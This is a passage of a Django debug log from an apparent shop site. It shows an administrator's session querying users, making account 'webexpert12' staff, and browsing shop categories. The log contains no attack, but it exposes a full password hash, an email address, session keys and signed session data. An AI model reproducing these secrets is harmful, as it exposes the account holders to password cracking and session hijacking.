ORDER BY "auth_group"."name" ASC; args=() DEBUG 2019-12-10 06:28:45,889 utils 32196 139885061072640 (0.001) SELECT COUNT(*) AS "__count" FROM "auth_user"; args=() DEBUG 2019-12-10 06:28:45,891 utils 32196 139885061072640 (0.000) SELECT COUNT(*) AS "__count" FROM "auth_user"; args=() DEBUG 2019-12-10 06:28:45,897 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" ORDER BY "auth_user"."username" ASC; args=() DEBUG 2019-12-10 06:28:46,055 utils 32196 139885061072640 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-24T06:28:46.052294+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 24, 6, 28, 46, 52294, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [10/Dec/2019 06:28:46] "GET /auth/user/ HTTP/1.0" 200 9542 DEBUG 2019-12-10 06:28:46,383 utils 32196 139885061072640 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-10T06:28:46.374329+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 10, 6, 28, 46, 374329, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-10 06:28:46,386 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [10/Dec/2019 06:28:46] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-10 06:28:52,928 utils 32196 139885061072640 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-10T06:28:52.919227+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 10, 6, 28, 52, 919227, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-10 06:28:52,931 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-10 06:28:52,932 utils 32196 139885061072640 (0.000) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 8; args=(8,) DEBUG 2019-12-10 06:28:52,941 utils 32196 139885061072640 (0.002) SELECT "auth_group"."id", "auth_group"."name" FROM "auth_group" INNER JOIN "auth_user_groups" ON ("auth_group"."id" = "auth_user_groups"."group_id") WHERE "auth_user_groups"."user_id" = 8; args=(8,) DEBUG 2019-12-10 06:28:52,947 utils 32196 139885061072640 (0.004) SELECT "auth_permission"."id", "auth_permission"."name", "auth_permission"."content_type_id", "auth_permission"."codename" FROM "auth_permission" INNER JOIN "auth_user_user_permissions" ON ("auth_permission"."id" = "auth_user_user_permissions"."permission_id") INNER JOIN "django_content_type" ON ("auth_permission"."content_type_id" = "django_content_type"."id") WHERE "auth_user_user_permissions"."user_id" = 8 ORDER BY "django_content_type"."app_label" ASC, "django_content_type"."model" ASC, "auth_permission"."codename" ASC; args=(8,) DEBUG 2019-12-10 06:28:52,953 utils 32196 139885061072640 (0.000) SELECT "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_content_type" WHERE ("django_content_type"."app_label" = 'auth' AND "django_content_type"."model" = 'user'); args=('auth', 'user') DEBUG 2019-12-10 06:28:53,027 utils 32196 139885061072640 (0.001) DECLARE "_django_curs_139885061072640_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "auth_group"."id", "auth_group"."name" FROM "auth_group" ORDER BY "auth_group"."name" ASC; args=() DEBUG 2019-12-10 06:28:53,037 utils 32196 139885061072640 (0.001) DECLARE "_django_curs_139885061072640_2" NO SCROLL CURSOR WITH HOLD FOR SELECT "auth_permission"."id", "auth_permission"."name", "auth_permission"."content_type_id", "auth_permission"."codename", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "auth_permission" INNER JOIN "django_content_type" ON ("auth_permission"."content_type_id" = "django_content_type"."id") ORDER BY "django_content_type"."app_label" ASC, "django_content_type"."model" ASC, "auth_permission"."codename" ASC; args=() DEBUG 2019-12-10 06:28:53,092 utils 32196 139885061072640 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-24T06:28:53.090847+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 24, 6, 28, 53, 90847, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [10/Dec/2019 06:28:53] "GET /auth/user/8/change/ HTTP/1.0" 200 15471 [10/Dec/2019 06:28:53] "GET /static/admin/js/calendar.js HTTP/1.0" 200 7777 [10/Dec/2019 06:28:53] "GET /static/admin/js/admin/DateTimeShortcuts.js HTTP/1.0" 200 20218 [10/Dec/2019 06:28:53] "GET /static/admin/js/SelectBox.js HTTP/1.0" 200 5753 [10/Dec/2019 06:28:53] "GET /static/admin/js/SelectFilter2.js HTTP/1.0" 200 12322 DEBUG 2019-12-10 06:28:53,721 utils 32196 139885050582784 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-10T06:28:53.709274+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 10, 6, 28, 53, 709274, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-10 06:28:53,724 utils 32196 139885050582784 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [10/Dec/2019 06:28:53] "GET /jsi18n/ HTTP/1.0" 200 3223 [10/Dec/2019 06:28:54] "GET /static/admin/img/selector-icons.svg HTTP/1.0" 200 3291 [10/Dec/2019 06:28:54] "GET /static/admin/img/icon-unknown.svg HTTP/1.0" 200 655 [10/Dec/2019 06:28:54] "GET /static/admin/img/icon-calendar.svg HTTP/1.0" 200 1086 [10/Dec/2019 06:28:54] "GET /static/admin/img/icon-unknown-alt.svg HTTP/1.0" 200 655 [10/Dec/2019 06:28:54] "GET /static/admin/img/icon-clock.svg HTTP/1.0" 200 677 DEBUG 2019-12-10 06:29:08,908 utils 32196 139885028853504 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-10T06:29:08.897590+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 10, 6, 29, 8, 897590, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-10 06:29:08,912 utils 32196 139885028853504 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-10 06:29:08,914 utils 32196 139885028853504 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 8; args=(8,) DEBUG 2019-12-10 06:29:08,922 utils 32196 139885028853504 (0.001) SELECT "auth_group"."id", "auth_group"."name" FROM "auth_group" INNER JOIN "auth_user_groups" ON ("auth_group"."id" = "auth_user_groups"."group_id") WHERE "auth_user_groups"."user_id" = 8; args=(8,) DEBUG 2019-12-10 06:29:08,927 utils 32196 139885028853504 (0.003) SELECT "auth_permission"."id", "auth_permission"."name", "auth_permission"."content_type_id", "auth_permission"."codename" FROM "auth_permission" INNER JOIN "auth_user_user_permissions" ON ("auth_permission"."id" = "auth_user_user_permissions"."permission_id") INNER JOIN "django_content_type" ON ("auth_permission"."content_type_id" = "django_content_type"."id") WHERE "auth_user_user_permissions"."user_id" = 8 ORDER BY "django_content_type"."app_label" ASC, "django_content_type"."model" ASC, "auth_permission"."codename" ASC; args=(8,) DEBUG 2019-12-10 06:29:08,948 utils 32196 139885028853504 (0.001) SELECT (1) AS "a" FROM "auth_user" WHERE ("auth_user"."username" = 'webexpert12' AND NOT ("auth_user"."id" = 8)) LIMIT 1; args=('webexpert12', 8) DEBUG 2019-12-10 06:29:08,951 utils 32196 139885028853504 (0.001) UPDATE "auth_user" SET "password" = 'pbkdf2_sha256$150000$gp7gINDJ2ckU$4t/kv65DHfCN1/1ShjxUE+Bq+Sds/HTBK+DrmqlnOAY=', "last_login" = NULL, "is_superuser" = false, "username" = 'webexpert12', "first_name" = '', "last_name" = '', "email" = 'webexpert12@gmail.com', "is_staff" = true, "is_active" = true, "date_joined" = '2019-12-10T06:28:16+00:00'::timestamptz WHERE "auth_user"."id" = 8; args=('pbkdf2_sha256$150000$gp7gINDJ2ckU$4t/kv65DHfCN1/1ShjxUE+Bq+Sds/HTBK+DrmqlnOAY=', False, 'webexpert12', '', '', 'webexpert12@gmail.com', True, True, datetime.datetime(2019, 12, 10, 6, 28, 16, tzinfo=), 8) DEBUG 2019-12-10 06:29:08,954 utils 32196 139885028853504 (0.001) SELECT "auth_group"."id" FROM "auth_group" INNER JOIN "auth_user_groups" ON ("auth_group"."id" = "auth_user_groups"."group_id") WHERE "auth_user_groups"."user_id" = 8; args=(8,) DEBUG 2019-12-10 06:29:08,961 utils 32196 139885028853504 (0.001) SELECT "auth_permission"."id" FROM "auth_permission" INNER JOIN "auth_user_user_permissions" ON ("auth_permission"."id" = "auth_user_user_permissions"."permission_id") INNER JOIN "django_content_type" ON ("auth_permission"."content_type_id" = "django_content_type"."id") WHERE "auth_user_user_permissions"."user_id" = 8 ORDER BY "django_content_type"."app_label" ASC, "django_content_type"."model" ASC, "auth_permission"."codename" ASC; args=(8,) DEBUG 2019-12-10 06:29:08,965 utils 32196 139885028853504 (0.002) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-10T06:29:08.963386+00:00'::timestamptz, 6, 4, '8', 'webexpert12', 2, '[{"changed": {"fields": ["is_staff"]}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 10, 6, 29, 8, 963386, tzinfo=), 6, 4, '8', 'webexpert12', 2, '[{"changed": {"fields": ["is_staff"]}}]') [10/Dec/2019 06:29:08] "POST /auth/user/8/change/ HTTP/1.0" 302 0 DEBUG 2019-12-10 06:29:09,267 utils 32196 139885028853504 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-10T06:29:09.256025+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 10, 6, 29, 9, 256025, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-10 06:29:09,270 utils 32196 139885028853504 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-10 06:29:09,274 utils 32196 139885028853504 (0.001) SELECT "auth_group"."id", "auth_group"."name" FROM "auth_group" ORDER BY "auth_group"."name" ASC; args=() DEBUG 2019-12-10 06:29:09,276 utils 32196 139885028853504 (0.001) SELECT COUNT(*) AS "__count" FROM "auth_user"; args=() DEBUG 2019-12-10 06:29:09,277 utils 32196 139885028853504 (0.000) SELECT COUNT(*) AS "__count" FROM "auth_user"; args=() DEBUG 2019-12-10 06:29:09,281 utils 32196 139885028853504 (0.000) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" ORDER BY "auth_user"."username" ASC; args=() DEBUG 2019-12-10 06:29:09,401 utils 32196 139885028853504 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-24T06:29:09.399531+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 24, 6, 29, 9, 399531, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [10/Dec/2019 06:29:09] "GET /auth/user/ HTTP/1.0" 200 9717 DEBUG 2019-12-10 06:29:09,742 utils 32196 139885028853504 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-10T06:29:09.732283+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 10, 6, 29, 9, 732283, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-10 06:29:09,744 utils 32196 139885028853504 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [10/Dec/2019 06:29:09] "GET /jsi18n/ HTTP/1.0" 200 3223 [10/Dec/2019 06:29:24] "GET / HTTP/1.0" 302 0 Not Found: /api/api-token-auth/ [10/Dec/2019 06:29:24] "OPTIONS /api/api-token-auth/ HTTP/1.0" 404 6657 DEBUG 2019-12-10 06:29:24,340 utils 32196 139885028853504 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'gzwxlnzeh2ltkj23ht4zaait55pqe8b6' LIMIT 1; args=('gzwxlnzeh2ltkj23ht4zaait55pqe8b6',) DEBUG 2019-12-10 06:29:24,341 utils 32196 139885028853504 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('gzwxlnzeh2ltkj23ht4zaait55pqe8b6', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-24T06:29:24.340478+00:00'::timestamptz); args=('gzwxlnzeh2ltkj23ht4zaait55pqe8b6', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 6, 29, 24, 340478, tzinfo=)) [10/Dec/2019 06:29:24] "GET /login/?next=/ HTTP/1.0" 200 1786 [10/Dec/2019 06:31:51] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 06:32:59,350 utils 32196 139885028853504 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-10T06:32:59.341591+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 10, 6, 32, 59, 341591, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-10 06:32:59,353 utils 32196 139885028853504 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-10 06:32:59,383 utils 32196 139885028853504 (0.002) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-10 06:32:59,391 utils 32196 139885028853504 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-24T06:32:59.389995+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 24, 6, 32, 59, 389995, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [10/Dec/2019 06:32:59] "GET /admin/ HTTP/1.0" 200 8857 DEBUG 2019-12-10 06:33:01,829 utils 32196 139885028853504 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-10T06:33:01.818367+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 10, 6, 33, 1, 818367, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-10 06:33:01,832 utils 32196 139885028853504 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-10 06:33:01,837 utils 32196 139885028853504 (0.002) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-10 06:33:01,838 utils 32196 139885028853504 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-10 06:33:01,846 utils 32196 139885028853504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() DEBUG 2019-12-10 06:33:01,937 utils 32196 139885028853504 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-24T06:33:01.934834+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 24, 6, 33, 1, 934834, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [10/Dec/2019 06:33:01] "GET /shop/category/ HTTP/1.0" 200 6758 DEBUG 2019-12-10 06:33:02,231 utils 32196 139885028853504 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-10T06:33:02.216748+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 10, 6, 33, 2, 216748, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-10 06:33:02,235 utils 32196 139885028853504 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [10/Dec/2019 06:33:02] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-10 06:33:59,794 utils 32196 139885028853504 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 06:33:59,801 utils 32196 139885028853504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 06:33:59,803 utils 32196 139885028853504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 06:33:59,805 utils 32196 139885028853504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 06:33:59,808 utils 32196 139885028853504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 06:33:59,810 utils 32196 139885028853504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 06:33:59,812 utils 32196 139885028853504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 06:33:59,814 utils 32196 139885028853504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", 